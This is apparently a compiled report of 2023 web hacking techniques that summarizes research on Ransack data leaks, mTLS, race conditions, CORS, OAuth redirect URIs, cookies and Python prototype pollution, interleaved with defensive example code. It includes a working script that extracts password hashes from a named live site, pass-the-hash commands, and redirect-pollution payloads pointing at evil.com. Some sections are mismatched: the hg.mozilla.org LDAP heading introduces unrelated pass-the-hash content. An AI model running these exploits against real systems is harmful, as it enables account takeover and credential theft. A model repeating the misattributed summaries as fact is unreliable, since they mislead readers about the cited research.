Web Hacking Techniques 2023
Uploaded by f7vbzqcfzt
HADESS.IO Top 10 web hacking techniques 2023

This collection surveys the year's web exploitation techniques, shedding light on the latest tactics employed by malicious actors: from Cross-Origin Resource Sharing (CORS) misconfigurations leading to the probing and exfiltration of sensitive data, through remote code execution via LDAP truncation and prototype pollution in Python, to various other novel approaches. The articles also point towards effective defense strategies to protect our digital infrastructure.

About Hadess

At Hadess, our mission is twofold: to unleash the power of white hat hacking in punishing black hat hackers [...] an elite team of expert cybersecurity professionals to identify, neutralize, and bring to justice those [...] With an unwavering focus on integrity, innovation, and client satisfaction, we strive to be the guardian [...]

Contents

* Ransacking your password reset tokens
* mTLS: When certificate authentication is done wrong
* Smashing the state machine: the true potential of web race conditions
* Bypass firewalls with of-CORs and typo-squatting
* RCE via LDAP truncation on hg.mozilla.org
* Cookie Bugs - Smuggling & Injection
* OAuth 2.0 Redirect URI Validation Falls Short, Literally
* Prototype Pollution in Python
* Pretalx Vulnerabilities: How to get accepted at every conference
* From Akamai to F5 to NTLM... with love
* can I speak to your manager? hacking root EPP servers to take control of zones
* Blind CSS Exfiltration: exfiltrate unknown web pages
* Server-side prototype pollution: Black-box detection [...]
* Tricks for Reliable Split-Second DNS Rebinding in [...]
* SMTP Smuggling - Spoofing E-Mails Worldwide
* DOM-based race condition: racing in the browser for fun - RyotaK's Blog
* You Are Not Where You Think You Are, Opera Browsers Address Bar Spoofing Vulnerabilities
* CVE-2022-4908: SOP bypass in Chrome using Navigation API
* SSO Gadgets: Escalate (Self-)XSS to ATO
* Three New Attacks Against JSON Web Tokens
* Introducing wrapwrap: using PHP filters to wrap a file [...]
* A New Vector For "Dirty" Arbitrary File Write to RCE
* How I Hacked Microsoft Teams and got $150,000 in [...]
* AWS WAF Clients Left Vulnerable to SQL Injection Due to Unorthodox MSSQL Design Choice
* [...] results manipulation and account takeover
* MyBB Admin Panel RCE CVE-2023-41362
* [...] CI/CD Platform TeamCity
* Code Vulnerabilities Put Skiff Emails at Risk
* JMX Exploitation Revisited
* Java Exploitation Restrictions in Modern JDK Times
* Exploiting Hardened .NET Deserialization
* Unserializable, but unreachable: Remote code execution on vBulletin
* Cookieless DuoDrop: IIS Auth Bypass & App Pool Privesc in ASP.NET Framework
* nOAuth: How Microsoft OAuth Misconfiguration Can Lead to Full Account Takeover
* One Scheme to Rule Them All: OAuth Account [...]
* Exploiting HTTP Parsers Inconsistencies
* New ways of breaking app-integrated LLMs
* State of DNS Rebinding in 2023
* Fileless Remote Code Execution on Juniper Firewalls
* Thirteen Years On: Advancing the Understanding of IIS Short File Name (SFN) Disclosure!
* Uncovering a crazy privilege escalation from Chrome extensions
* Hacking into gRPC-Web
* Yelp ATO via XSS + Cookie Bridge
* XSS in GMAIL Dynamic Email
* Azure B2C Crypto Misuse and Account Compromise
* EmojiDeploy: Smile! Your Azure web service just got RCEd
* One Supply Chain Attack to Rule Them All
* draw.io CVEs
* Leaking Secrets From GitHub Actions: Reading Files And [...], Intercepting Network/Process Communication, Dumping Memory
* The GitHub Actions Worm: Compromising GitHub Repositories Through the Actions Dependency Tree
* From an Innocent Client-Side Path Traversal to Account Takeover
* [...] remote and root access in SAP Enterprise Software
* AWS WAF Bypass: invalid JSON object and unicode [...]
* Cookie Crumbles: Breaking and Fixing Web Session [...]
* Memcached Command Injections at Pylibmc

Executive Summary

The collection of articles presents a wide-ranging exploration of cybersecurity vulnerabilities, highlighting the ever-evolving strategies employed by threat actors. The articles cover diverse attack vectors, starting with a focus on Rails applications using the Ransack library. This underscores the need for measures to thwart increasingly sophisticated attacks. Other noteworthy topics include remote code execution through LDAP truncation, cookie-related vulnerabilities leading to smuggling and injection, and the exploitation of OAuth, prototype pollution in Python, and server-side prototype pollution. These insights collectively contribute to an understanding of contemporary cyber threats.

A significant emphasis is placed on techniques for bypassing firewalls, such as exploiting CORS misconfigurations and typo-squatting domains. The articles underscore the necessity for organizations to fortify their defenses against such intrusion attempts.

Mutual TLS (mTLS) vulnerabilities take center stage in another article, emphasizing the potential consequences of certificate authentication done wrong, including user impersonation, privilege escalation, and information leakage. This points to the critical importance of maintaining secure TLS implementations to safeguard sensitive data.

The concept of "everything is multi-step" race conditions is explored in depth, expanding the range of affected applications well beyond classic limit-overrun bugs. The introduction of a jitter-resistant "single packet attack" further complicates the security landscape, challenging conventional limit-overrun attack defenses.

Key Findings

The articles span a wide range of cybersecurity topics, each shedding light on sophisticated attack techniques and vulnerabilities. Key findings are drawn from, among others:

* Ransacking Password Reset Tokens
* Bypassing Firewalls with of-CORs and Typo-squatting
* Prototype Pollution in Python

Abstract

In the dynamic landscape of cybersecurity, the past year has witnessed a surge in groundbreaking research contributions from security researchers across various platforms. These findings, shared through blog posts, presentations, and whitepapers, harbor innovative ideas poised to inspire future breakthroughs. However, the abundance of this valuable information often results in techniques being overlooked or forgotten quickly.

Since 2006, the cybersecurity community has united annually to address this challenge by creating two invaluable resources. The first is a comprehensive compilation of all notable web security research conducted over the past year. The second is a curated list highlighting the top ten most valuable pieces of work, providing a focused and digestible overview of the most impactful contributions. This article encourages readers to explore the full project archive, which encompasses past nominees and winners, offering a rich repository of insights. Moreover, it outlines the process of making nominations for the year 2023, inviting individuals to participate in recognizing and celebrating the outstanding efforts that continue to drive advancements in web security.

Techniques

Ransacking your password reset tokens

In this blog post, we demonstrate how the Ransack library, a popular tool for implementing search functionality in Ruby on Rails applications, can be exploited to exfiltrate sensitive data from the database. We also show how we identified hundreds of potentially vulnerable applications on the internet using GitHub, searchcode, and Common Crawl. We provide a case study of how we became superadmin on fablabs.io, a platform for makerspaces, by exploiting this vulnerability. We suggest using explicit allow lists for searchable attributes and associations, as well as limiting the exposure of the 'q' parameter, as possible mitigations for this issue (Ransack 4.0 made such allow lists mandatory, so the default-open behaviour described below applies to earlier versions). We also mention other technologies, such as Hasura (GraphQL) and Sequelize (Node.js), that are vulnerable to similar attacks when query filters with arbitrary conditional operators are configured.

Background

Ransack is a Ruby library that provides a very powerful feature set around object-based database searching in Rails applications. One of its main appeals is the ease with which it can be utilized to implement public-facing search functionality on a website. However, in its default configuration, Ransack will allow for query conditions based on properties of associated database objects [1]. The *_start, *_end or *_cont search matchers [2] can then be abused to exfiltrate sensitive string values of associated database objects via character-by-character brute force (a match is indicated by the returned JSON not being empty). A single bank account number can be extracted with <200 requests, a password hash can be extracted with ~1200 requests, all within a few minutes.

Discovery

We used GitHub, searchcode, and Common Crawl to identify hundreds of potentially vulnerable applications on the internet. We searched for the keywords "ransack" and "q" in the source code and the URL parameters, respectively. We filtered out the results that used explicit allow lists or did not expose the 'q' parameter to the public. We also manually verified some of the results to confirm the vulnerability.

Exploitation

We chose fablabs.io, a platform for makerspaces, as a case study of how we exploited this vulnerability. We found that the 'q' parameter was used to search for lab projects on the website. We also noticed that the project model had an association with the user model, which contained sensitive attributes such as encrypted_password, reset_password_token, and confirmation_token. We used the following Python script to extract the encrypted_password of the first user in the database, who happened to be the superadmin:

```python
import requests
import string

url = "https://fablabs.io/projects.json"
# Devise stores bcrypt hashes ("$2a$..."), so "$", "." and "/" are added to the
# alphabet of the original script; without them the first character never matches.
chars = string.ascii_letters + string.digits + "$./"
password = ""

while True:
    for c in chars:
        # Ransack's *_start matcher on the associated user model, in the flat
        # Rails parameter form; a non-empty JSON result means the prefix is correct.
        payload = {"q[user_encrypted_password_start]": password + c}
        r = requests.get(url, params=payload)
        if r.json():
            password += c
            print(password)
            break
    else:
        # no character extends the prefix any further: the full value is recovered
        break
```
mTLS: When certificate authentication is done wrong

This blog post explains how to use mutual TLS (mTLS) for client and server authentication and authorization, and how to avoid common mistakes and pitfalls. mTLS is a security mechanism that allows both the client and the server to verify each other's identity and authorization using TLS certificates. mTLS can also bind access tokens to the client's certificate, preventing token theft and replay attacks.

mTLS Techniques

The blog post describes the following techniques for implementing and using mTLS correctly:

* Certificate generation: The client and the server need to have valid TLS certificates, either self-signed or issued by a trusted certificate authority (CA). The certificates should contain information about the identity and authorization of the client or the server, such as the subject, issuer, or subject alternative name (SAN) extensions. For example, to generate a self-signed certificate for the client using OpenSSL, the following command can be used: openssl req -x509 -newkey rsa:4096 -keyout client.key -out client.crt -days 365 -nodes -subj "/CN=client"

* Certificate verification: The client and the server need to verify each other's certificates during the TLS handshake, using the public key and the certificate chain. The client and the server should also check the validity and revocation status of the certificates, using mechanisms such as certificate revocation lists (CRLs) or the Online Certificate Status Protocol (OCSP). Only after the chain has been validated should fields such as the CN or SAN be used for authorization decisions. For example, to verify a certificate using OpenSSL, the following command can be used: openssl verify -CAfile ca.crt client.crt

* Certificate binding: The client and the server need to bind the access tokens to the client's certificate, using mechanisms such as certificate thumbprint confirmation or certificate-bound access tokens. The client and the server should also ensure that the access tokens are validated against the certificates, using mechanisms such as token introspection or token signature verification. For example, to bind an access token to a certificate using the thumbprint confirmation method, the following steps can be used:
  1. The client computes the SHA-256 hash of its certificate and sends it, along with the access token request, to the authorization server.
  2. The authorization server verifies the client's certificate and stores the hash value in the access token or the token metadata.
  3. The client sends the access token and its certificate to the protected resource.
  4. The protected resource verifies the client's certificate and computes the hash value. It then compares the hash value with the one stored in the access token or the token metadata. If they match, the access token is valid and bound to the certificate.
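The four binding steps above, as an added example that is not code from the original article: the thumbprint is the RFC 8705 x5t#S256 value (base64url of SHA-256 over the DER certificate), the authorization server puts it in a cnf claim and signs the token, and the protected resource recomputes the thumbprint from the certificate presented on the current TLS connection. The certificate byte strings and the HMAC signing key are constructed placeholders; a real deployment takes the DER certificate from the TLS layer after chain validation and signs tokens with the authorization server's key.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed stand-ins for the DER-encoded certificates the TLS stack would
# hand to the application after the handshake; any bytes work for hashing.
CLIENT_CERT_DER = b"\x30\x82\x01\x0a constructed client certificate bytes"
OTHER_CERT_DER = b"\x30\x82\x01\x0a constructed certificate of another client"
AS_SIGNING_KEY = b"authorization-server signing key (demo only)"


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def x5t_s256(cert_der: bytes) -> str:
    """Step 1: base64url(SHA-256(DER certificate)), the RFC 8705 'x5t#S256' thumbprint."""
    return b64url(hashlib.sha256(cert_der).digest())


def issue_token(client_cert_der: bytes, subject: str) -> str:
    """Step 2 (authorization server): the client certificate was already verified by the
    TLS layer; store its thumbprint in the 'cnf' claim and sign the token (HMAC here)."""
    claims = {"sub": subject, "scope": "read", "cnf": {"x5t#S256": x5t_s256(client_cert_der)}}
    body = b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = b64url(hmac.new(AS_SIGNING_KEY, body.encode(), hashlib.sha256).digest())
    return body + "." + sig


def verify_token(token: str, presented_cert_der: Optional[bytes]) -> Optional[dict]:
    """Steps 3-4 (protected resource): check the signature, then compare the thumbprint of
    the certificate presented on *this* connection with the one bound into the token.
    Returns the claims on success and None on any failure."""
    try:
        body, sig = token.split(".")
    except ValueError:
        return None
    expected = b64url(hmac.new(AS_SIGNING_KEY, body.encode(), hashlib.sha256).digest())
    if not hmac.compare_digest(sig, expected):
        return None
    padded = body + "=" * (-len(body) % 4)
    claims = json.loads(base64.urlsafe_b64decode(padded))
    bound = claims.get("cnf", {}).get("x5t#S256")
    if bound is None or presented_cert_der is None:
        # A bound token arriving without a client certificate is a replay, not a bearer token.
        return None
    if not hmac.compare_digest(bound, x5t_s256(presented_cert_der)):
        return None
    return claims


if __name__ == "__main__":
    token = issue_token(CLIENT_CERT_DER, "client-1")
    print("legitimate client:", verify_token(token, CLIENT_CERT_DER) is not None)
    print("stolen token, other cert:", verify_token(token, OTHER_CERT_DER) is not None)
```

The resource must refuse a bound token when no client certificate was presented at all; treating it as a plain bearer token in that case silently removes the binding.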
Smashing the state machine: the true potential of web race conditions

This blog post reveals new classes of web race condition attacks that go beyond the typical limit-overrun exploits. Web race conditions occur when multiple concurrent requests interfere with each other, causing unexpected and insecure behavior. The blog post also introduces the single-packet attack, a technique that can send many requests in a very short time window, increasing the chances of winning the race.

Web Race Condition Techniques

The blog post describes the following techniques for finding and exploiting web race conditions:

* Object masking: This technique exploits the fact that some web applications use object identifiers (such as IDs or names) to perform actions on them, without checking whether the object belongs to the user. For example, if a website allows users to delete their own posts by sending a request with the post ID, an attacker can try to delete another user's post by sending a request with a different post ID at the same time.

* Multi-endpoint: This technique exploits the fact that some web applications use multiple endpoints to perform the same or related actions, without synchronizing them properly. For example, if a website allows users to add items to their cart by sending a request to one endpoint, and apply a discount code by sending a request to another endpoint, an attacker can try to apply the same discount code multiple times by sending requests to both endpoints at the same time.

* Single-endpoint: This technique exploits the fact that some web applications use a single endpoint to perform multiple actions, without locking them properly. For example, if a website allows users to transfer money between their accounts by sending a request with the source and destination account IDs and the amount, an attacker can try to transfer more money than they have by sending multiple requests with the same source and destination account IDs and different amounts at the same time.

* Deferred: This technique exploits the fact that some web applications use deferred or asynchronous actions, without checking the state of the objects before performing them. For example, if a website allows users to buy a product by sending a request with the product ID, and then sends an email confirmation with a link to download the product, an attacker can try to buy the product multiple times by sending multiple requests with the same product ID at the same time, and then download the product from each email link.

The blog post also provides some examples of how to perform these techniques using different tools and frameworks:

* Burp Suite: A web application security testing tool that can be used to intercept, modify, and replay HTTP requests. For example, to perform a single-endpoint attack, the attacker can place several Repeater tabs with different parameters for the same endpoint in a tab group and use "Send group in parallel", which applies the single-packet attack over HTTP/2 and last-byte synchronization over HTTP/1.1.

* Turbo Intruder: A Burp Suite extension that can be used to send large numbers of HTTP requests with high performance and scalability.
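The multi-endpoint discount example above, reduced to the check-then-act window it depends on. This is an added, constructed model, not code from the article or from Burp: a toy Cart whose discount may be applied once, hit by several threads at the same time. A Barrier placed between the check and the write stands in for the simultaneous arrival that the single-packet attack produces on a real server, and makes the overrun reproducible; the safe variant performs check and write inside one critical section, which on a real backend would be a database row lock or an atomic conditional update rather than a process-local mutex.

```python
import threading
from typing import Callable, List, Optional


class Cart:
    """Constructed toy model: a discount code may be applied to a cart at most once."""

    DISCOUNT = 10

    def __init__(self, total: int) -> None:
        self.total = total
        self.discount_applied = False
        self._lock = threading.Lock()

    def apply_discount_racy(self, arrival: Optional[threading.Barrier] = None) -> bool:
        # Check ... (the sub-state "not yet applied" is visible to other requests here) ... act.
        if self.discount_applied:
            return False
        if arrival is not None:
            # Every concurrent request waits here, standing in for the simultaneous
            # arrival that the single-packet attack produces on a real server.
            arrival.wait(timeout=5)
        self.total -= self.DISCOUNT
        self.discount_applied = True
        return True

    def apply_discount_safe(self, arrival: Optional[threading.Barrier] = None) -> bool:
        # Check and act inside one critical section; 'arrival' is accepted only so both
        # handlers share a signature, it is never waited on here.
        with self._lock:
            if self.discount_applied:
                return False
            self.total -= self.DISCOUNT
            self.discount_applied = True
            return True


def race(handler: Callable[[Optional[threading.Barrier]], bool], n: int,
         arrival: Optional[threading.Barrier]) -> int:
    """Send n 'requests' concurrently and return how many of them reported success."""
    results: List[bool] = []
    threads = [threading.Thread(target=lambda: results.append(handler(arrival))) for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results)


def demo(n: int = 5):
    """Returns (successes, final total) for the racy handler, then for the safe one."""
    racy = Cart(100)
    racy_hits = race(racy.apply_discount_racy, n, threading.Barrier(n))
    safe = Cart(100)
    safe_hits = race(safe.apply_discount_safe, n, None)
    return racy_hits, racy.total, safe_hits, safe.total


if __name__ == "__main__":
    print(demo())   # racy handler applies the discount n times, safe handler once
```

The racy handler's flaw is not the missing lock as such but the observable intermediate state between the check and the write; the same window exists across two endpoints that share the cart row, which is the multi-endpoint case.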
For example, to perform a single-packet attack, the attacker can use Turbo Intruder's Python scripting with the HTTP/2 engine (Engine.BURP2), queueing the requests behind a named gate so that the final bytes of every request leave in one TCP packet when the gate is opened.

* DevTools: A set of web developer tools built into the browser that can be used to inspect and debug web applications. For example, to perform an object masking attack, the attacker can use DevTools to inspect the network requests and find the object identifiers, and then modify them using DevTools or Burp Suite.

Bypass firewalls with of-CORs and typo-squatting

Of CORS: Exploiting Misconfigured Cross-Origin Resource Sharing

This blog post demonstrates how to exploit misconfigured cross-origin resource sharing (CORS) policies to perform various attacks, such as stealing sensitive data, bypassing CSRF protection, and executing arbitrary commands. CORS is a browser mechanism that allows controlled access to resources from different origins, by using HTTP headers to indicate the allowed origins, methods, and headers. However, if the CORS policy is not implemented correctly, it can introduce security risks and vulnerabilities.

CORS Exploitation Techniques

The blog post describes the following techniques for exploiting CORS:

* Origin reflection: This technique exploits the fact that some applications use the Origin header sent by the browser to dynamically generate the Access-Control-Allow-Origin (ACAO) header in the response, without validating the origin. For example, if a website echoes back the Origin header as the ACAO header, an attacker can send a request with a malicious origin and receive the response with the same origin in the ACAO header, allowing cross-origin access.

* Null origin: This technique exploits the fact that some applications treat the null origin as a special case and allow cross-origin access to it, without considering the implications. For example, if a website returns an ACAO header with the value null, an attacker can issue the request from a sandboxed iframe (sandbox="allow-scripts" without allow-same-origin), which gives the frame an opaque origin and causes the browser to send Origin: null; the response carries the same value in the ACAO header, allowing cross-origin access. Because null is a concrete value rather than the * wildcard, this also works when Access-Control-Allow-Credentials: true is set, so authenticated responses can be read.

* Regex bypass: This technique exploits the fact that some applications use regular expressions to match the Origin header against a list of allowed origins, without properly escaping or anchoring the pattern. For example, if a website uses a regex like https?://.*\.example.com to match the Origin header, the unescaped final dot and the missing end anchor mean that an origin such as https://www.example.com.evil.com also matches, and the attacker receives the response with that origin in the ACAO header, allowing cross-origin access.

* PostMessage proxy: This technique exploits the fact that some applications use the postMessage API to communicate with cross-origin frames, without verifying the origin of the messages. For example, if a website uses postMessage to send data to an iframe with a different origin and expects a response back, an attacker can create a malicious iframe that intercepts the messages and sends back arbitrary responses, allowing cross-origin access.

* DNS rebinding: This technique exploits the fact that some applications use the Host header to determine the origin of the request, without checking the IP address of the host. For example, if a website uses the Host header to generate the ACAO header, an attacker can create a malicious DNS record that points to the website's IP address, and send a request with the malicious host name, which causes the website to return the response with the same host name in the ACAO header, allowing cross-origin access.
RCE via LDAP truncation on hg.mozilla.org

Pash: A PowerShell-based Pass-the-Hash Tool

This blog post introduces Pash, a PowerShell-based tool that can perform pass-the-hash attacks on Windows systems. Pass-the-hash is a technique that allows an attacker to authenticate to a remote system or service by using the underlying NTLM or LanMan hash of a user's password, instead of requiring the associated plaintext password. Pash leverages the native Windows APIs and PowerShell features to perform pass-the-hash attacks without requiring any third-party tools or libraries.

Pash Techniques

The blog post describes the following techniques for using Pash to perform pass-the-hash attacks:

* Impersonation: This technique uses the LogonUser API to create a new logon session with the given username and password hash, and then uses the ImpersonateLoggedOnUser API to impersonate the user in the current PowerShell process. This allows the attacker to execute commands or access resources as the user. For example, to impersonate a user with the username Administrator and the password hash aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (the LM:NT hash pair of an empty password), the following PowerShell command can be used: Invoke-Pash -Username Administrator -PasswordHash aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -Impersonate

* Token manipulation: This technique uses the CreateProcessWithTokenW API to create a new process with the token of the user that was impersonated by the previous technique.
This allows the attacker to launch a new PowerShell process or any other executable as the user. For example, to launch a new PowerShell process as the user that was impersonated, the following PowerShell command can be used: Invoke-Pash -CreateProcess powershell

* Network authentication: This technique uses the SetThreadToken API to set the token of the current thread to the token of the user that was impersonated by the first technique. This allows the attacker to perform network authentication as the user, such as accessing SMB shares or using WinRM. For example, to access an SMB share on a remote system with the IP address 192.168.1.10 as the user that was impersonated, the following PowerShell command can be used: Invoke-Pash -SetThreadToken; Get-ChildItem \\192.168.1.10\share

Cookie Bugs - Smuggling & Injection

Cookie Bugs: How to Exploit Cookie-Based Vulnerabilities

This blog post shows how to exploit cookie-based vulnerabilities to perform various attacks, such as session hijacking, cross-site scripting (XSS), and cross-site request forgery (CSRF). Cookies are small pieces of data that are stored by the browser and sent to the server with every request. Cookies are used to store information such as user preferences, authentication tokens, and session IDs. However, if cookies are not handled properly, they can introduce security risks and vulnerabilities.

Cookie Exploitation Techniques

The blog post describes the following techniques for exploiting cookie-based vulnerabilities:

* Cookie stealing: This technique involves stealing the cookies of another user and using them to impersonate or hijack their account. This can be done by exploiting XSS vulnerabilities, sniffing network traffic, or using social engineering. For example, if a website is vulnerable to XSS, an attacker can inject a malicious script that sends the cookies of the victim to the attacker's server, and then use the cookies to log in as the victim. To prevent cookie stealing, cookies should be marked as HttpOnly, Secure, and SameSite, and should have a short expiration time.

* Cookie tampering: This technique involves modifying the cookies of the current user and changing their values or attributes. This can be done by using browser tools, proxy tools, or malicious scripts. For example, if a website uses cookies to store user preferences, an attacker can tamper with the cookies and change the preferences to something malicious or unwanted. To prevent cookie tampering, cookies should be encrypted, signed, or validated by the server, and should have a strict domain and path scope.

* Cookie poisoning: This technique involves injecting malicious data or code into the cookies of the current user or another user. This can be done by exploiting CSRF vulnerabilities, XSS vulnerabilities, or using social engineering. For example, if a website uses cookies to store user input, an attacker can poison the cookies and inject malicious input that can cause data corruption or code execution. To prevent cookie poisoning, cookies should be sanitized, validated, and escaped by the server, and should not be used to store sensitive or untrusted data.
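The defensive attributes the three bullets above call for (HttpOnly, Secure, SameSite, short lifetime, tight scope), turned into a check that can be run over captured Set-Cookie headers. This is an added example, not code from the article; the four headers are constructed samples and the one-day Max-Age ceiling is an assumed review threshold.

```python
from typing import Dict, List, Union

# Constructed Set-Cookie headers, as a proxy or test harness would capture them.
SAMPLE_SET_COOKIE = [
    "session=9f2c1e; Path=/; HttpOnly; Secure; SameSite=Lax; Max-Age=3600",
    "remember_me=tok-1; Path=/; Expires=Wed, 01 Jan 2025 00:00:00 GMT",
    "theme=dark; Path=/; Domain=.example.com",
    "csrftoken=xyz; Secure; SameSite=None",
]

Attrs = Dict[str, Union[str, bool]]


def parse_set_cookie(header: str) -> Dict[str, object]:
    """Split 'name=value; Attr; Attr=val' into name, value and a lower-cased attribute map."""
    name_value, *attrs = [part.strip() for part in header.split(";")]
    name, _, value = name_value.partition("=")
    parsed: Attrs = {}
    for attr in attrs:
        key, _, val = attr.partition("=")
        parsed[key.strip().lower()] = val.strip() if val else True
    return {"name": name, "value": value, "attrs": parsed}


def audit(header: str, max_age_limit: int = 86400) -> List[str]:
    """Return the findings a reviewer would raise for one Set-Cookie header."""
    cookie = parse_set_cookie(header)
    attrs = cookie["attrs"]
    findings: List[str] = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly")
    if "secure" not in attrs:
        findings.append("missing Secure")
    samesite = str(attrs.get("samesite", "")).lower()
    if not samesite:
        findings.append("missing SameSite")
    elif samesite == "none" and "secure" not in attrs:
        findings.append("SameSite=None without Secure (browsers drop the cookie)")
    if "max-age" in attrs and int(attrs["max-age"]) > max_age_limit:
        findings.append("Max-Age exceeds %d seconds" % max_age_limit)
    if "domain" in attrs:
        # An explicit Domain attribute sends the cookie to every subdomain, widening the scope.
        findings.append("Domain=%s widens scope to every subdomain" % attrs["domain"])
    return findings


def audit_all(headers: List[str]) -> Dict[str, List[str]]:
    """Map each cookie name to its findings."""
    return {parse_set_cookie(h)["name"]: audit(h) for h in headers}


if __name__ == "__main__":
    for name, findings in audit_all(SAMPLE_SET_COOKIE).items():
        print(name, findings or "ok")
```

A CSRF token that a front end reads through document.cookie (double-submit pattern) legitimately lacks HttpOnly, so that particular finding needs a human to confirm which cookies carry session state.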
OAuth 2.0 Redirect URI Validation Falls Short, Literally

This blog post reveals new classes of attacks that exploit the redirect URI parameter in the OAuth 2.0 Authorization Code Grant flow. The redirect URI parameter specifies the callback endpoint that the user is redirected to after authenticating with the Identity Provider (IdP). The blog post shows that the OAuth 2.0 specification and security guidance are under-specified and insufficient to prevent path confusion and parameter pollution attacks on the redirect URI.

OAuth 2.0 Redirect URI Exploitation Techniques

The blog post describes the following techniques for exploiting the redirect URI parameter:

* Path confusion: This technique exploits the fact that some IdPs do not properly validate the path component of the redirect URI, and allow arbitrary paths to be appended to the registered base URI. For example, if the registered base URI is https://example.com/callback, an attacker can append a path such as /evil and send a request to the IdP with the redirect URI https://example.com/callback/evil. The IdP will then redirect the user to that path with the authorization code or token, allowing the attacker to intercept it. The OAuth 2.0 Security Best Current Practice calls for comparing the full redirect URI with simple string equality rather than prefix matching.

* Parameter pollution: This technique exploits the fact that some IdPs do not properly handle multiple instances of the redirect URI parameter, and use the last or the first occurrence of the parameter. For example, if the registered base URI is https://example.com/callback, an attacker can prepend or append a malicious URI such as https://evil.com and send a request to the IdP with multiple redirect URI parameters, such as redirect_uri=https://evil.com&redirect_uri=https://example.com/callback. If the component that validates the parameter and the component that builds the redirect pick different occurrences, the IdP will redirect the user to the malicious URI with the authorization code or token, allowing the attacker to intercept it.
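Both redirect URI weaknesses above, modelled as an added example that is not code from the article. authorize_vulnerable() plays an IdP that accepts any URI with the registered one as a prefix and, when redirect_uri is repeated, validates the last occurrence but redirects to the first; authorize_strict() requires exactly one occurrence and an exact string match. The registered URI, client_id and query strings are constructed for the demonstration.

```python
from typing import List, Optional
from urllib.parse import parse_qsl

# Assumed client registration (not from the article).
REGISTERED_REDIRECT_URI = "https://client.example/callback"


def redirect_uri_values(query: str) -> List[str]:
    """All redirect_uri values in the authorization request, in order of appearance."""
    return [v for k, v in parse_qsl(query, keep_blank_values=True) if k == "redirect_uri"]


def authorize_vulnerable(query: str) -> Optional[str]:
    """IdP with both weaknesses: prefix matching (path confusion) and inconsistent handling
    of repeated parameters (validation sees the last value, the redirect uses the first).
    Returns the URI the authorization code would be sent to, or None if rejected."""
    values = redirect_uri_values(query)
    if not values:
        return None
    validated = values[-1]
    if not validated.startswith(REGISTERED_REDIRECT_URI):
        return None
    return values[0]


def authorize_strict(query: str) -> Optional[str]:
    """Exactly one redirect_uri, compared with the registration by simple string equality."""
    values = redirect_uri_values(query)
    if len(values) != 1 or values[0] != REGISTERED_REDIRECT_URI:
        return None
    return values[0]


# Constructed authorization requests.
PATH_CONFUSION = "response_type=code&client_id=app&redirect_uri=https://client.example/callback/evil"
PARAM_POLLUTION = ("response_type=code&client_id=app"
                   "&redirect_uri=https://evil.example/"
                   "&redirect_uri=https://client.example/callback")
LEGITIMATE = "response_type=code&client_id=app&redirect_uri=https://client.example/callback"


if __name__ == "__main__":
    for label, q in (("path confusion", PATH_CONFUSION), ("parameter pollution", PARAM_POLLUTION)):
        print(label, "vulnerable ->", authorize_vulnerable(q), "| strict ->", authorize_strict(q))
```

The strict version also rejects a request with no redirect_uri at all instead of falling back to a default, which removes a third place where a registered-but-loose match could creep back in.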
Prototype Pollution in Python

This blog post explores how to exploit prototype pollution-like vulnerabilities in Python applications. Prototype pollution is a type of vulnerability that allows an attacker to modify the behavior of objects by manipulating their prototypes. Prototype pollution is usually associated with prototype-based languages such as JavaScript, but the blog post shows that similar attacks are possible in class-based languages such as Python.

Python Prototype Pollution Techniques

The blog post describes the following techniques for exploiting prototype pollution in Python:

* Class pollution: This technique exploits the fact that some Python applications use user input to set attributes of objects, without sanitizing or validating the input. For example, if an application uses the setattr function to set attributes of an object based on user input, an attacker can use this functionality to modify the attributes of the object's class or its parent classes, and change the behavior of the application. For example, to modify the __init__ method of the User class, the following payload can be used: {"name": "__class__.__init__", "value": "lambda self, *args, **kwargs: print('Hello, world')"}

* Global pollution: This technique exploits the fact that some Python applications use user input to set global variables, without sanitizing or validating the input. For example, if an application uses the globals function to access the global namespace and set variables based on user input, an attacker can use this functionality to modify the values of existing global variables or create new ones, and affect the behavior of the application. For example, to modify the value of the SECRET_KEY variable, the following payload can be used: {"name": "SECRET_KEY", "value": "HACKED"}

* Built-in pollution: This technique exploits the fact that some Python applications use user input to access built-in functions or classes, without sanitizing or validating the input.
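Class pollution and global pollution from the two bullets above, carried through a recursive merge of attacker-controlled JSON into an object, the pattern the article targets. This is an added example, not code from the article: the User class, the SECRET_KEY setting and the two payloads are constructed. merge_unsafe() follows keys verbatim, so __class__ reaches the class and __init__.__globals__ reaches the module namespace; merge_safe() refuses dunder keys and only sets allow-listed attributes.

```python
SECRET_KEY = "original-secret"   # constructed module-level setting


class User:
    is_admin = False            # class attribute: reachable through any instance's __class__

    def __init__(self, name: str) -> None:
        self.name = name


def merge_unsafe(src: dict, dst) -> None:
    """Recursive merge of attacker-controlled JSON into an object or dict, the pattern
    the article targets: keys are taken verbatim, including '__class__' and '__globals__'."""
    for key, value in src.items():
        if isinstance(dst, dict):
            if isinstance(value, dict) and key in dst:
                merge_unsafe(value, dst[key])
            else:
                dst[key] = value
        else:
            if isinstance(value, dict) and hasattr(dst, key):
                merge_unsafe(value, getattr(dst, key))
            else:
                setattr(dst, key, value)


def merge_safe(src: dict, dst, allowed=("name", "email")) -> None:
    """Same shape, but dunder keys are refused and object attributes come from an allow list."""
    for key, value in src.items():
        if key.startswith("__"):
            raise ValueError("refusing dunder key %r" % key)
        if isinstance(dst, dict):
            if isinstance(value, dict) and key in dst:
                merge_safe(value, dst[key], allowed)
            else:
                dst[key] = value
        else:
            if key not in allowed:
                raise ValueError("attribute %r not allowed" % key)
            setattr(dst, key, value)


# Constructed payloads: the first reaches the class, the second walks
# instance -> class -> __init__ function -> its __globals__ (the module namespace).
CLASS_POLLUTION = {"__class__": {"is_admin": True}}
GLOBAL_POLLUTION = {"__class__": {"__init__": {"__globals__": {"SECRET_KEY": "pwned"}}}}


def demo():
    """Returns (is_admin of a fresh user after class pollution, SECRET_KEY after global
    pollution, whether merge_safe refused the class-pollution payload)."""
    global SECRET_KEY
    User.is_admin = False
    SECRET_KEY = "original-secret"

    merge_unsafe(CLASS_POLLUTION, User("alice"))      # pollutes User itself, not just alice
    polluted_admin = User("mallory").is_admin

    merge_unsafe(GLOBAL_POLLUTION, User("alice"))     # rewrites the module global
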